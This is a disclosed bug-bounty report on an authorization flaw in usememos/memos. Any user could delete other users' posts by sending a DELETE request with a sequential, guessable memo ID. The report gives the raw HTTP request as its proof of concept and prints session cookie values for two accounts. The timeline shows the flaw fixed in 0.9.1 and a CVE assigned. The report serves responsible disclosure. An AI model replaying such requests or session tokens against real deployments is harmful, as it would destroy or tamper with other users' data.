An user can delete other user's post in usememos/memos

Valid

Reported on

Dec 26th 2022


Description

As the title, an attacker can delete other user's post via post id (can be bruteforce)

Here is video poc: https://drive.google.com/file/d/18QucWYwkpO9kVPMqNzSQ-ptwrZGk-UP9/view?usp=share_link

Proof of Concept

DELETE /api/memo/$1026$ HTTP/2
Host: demo.usememos.com
Cookie: memos_session=MTY3MjAyMzkzNnxEdi1GQkFFQ180WUFBUkFCRUFBQUhfLUdBQUVHYzNSeWFXNW5EQWtBQjNWelpYSXRhV1FEYVc1MEJBTUFfOUk9fMqNUegFqgfGemADcwgQYFDYFrRl2lsWdeCjjKUx_uEW
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://demo.usememos.com/
Origin: https://demo.usememos.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

The id 1026 is the post ID, when user create a post, the id increase 1 unit, so attacker can be delete other user's post via this id and request DELETE

Here is the session id with each account:

attacker session id memos_session=MTY3MjAyMzkzNnxEdi1GQkFFQ180WUFBUkFCRUFBQUhfLUdBQUVHYzNSeWFXNW5EQWtBQjNWelpYSXRhV1FEYVc1MEJBTUFfOUk9fMqNUegFqgfGemADcwgQYFDYFrRl2lsWdeCjjKUx_uEW

User demo session id: memos_session=MTY3MjAyMzI4MXxEdi1GQkFFQ180WUFBUkFCRUFBQUhfLUdBQUVHYzNSeWFXNW5EQWtBQjNWelpYSXRhV1FEYVc1MEJBTUFfOUE9fP5tDVSp1CxdxPlf5c_7FWcF5Yb5SFR7POch2HJbm_WD

Impact

This vulnerability impact all of the user

We are processing your report and will contact the usememos/memos team within 24 hours. 15 days ago
Nguyen Minh Quang modified the report
15 days ago
Nguyen Minh Quang modified the report
15 days ago
We have contacted a member of the usememos/memos team and are waiting to hear back 14 days ago
Nguyen Minh Quang modified the report
13 days ago
STEVEN validated this vulnerability 12 days ago
Nguyen Minh Quang has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
STEVEN marked this as fixed in 0.9.1 with commit 3556ae 12 days ago
STEVEN has been awarded the fix bounty
This vulnerability has been assigned a CVE
STEVEN published this vulnerability 12 days ago
to join this conversation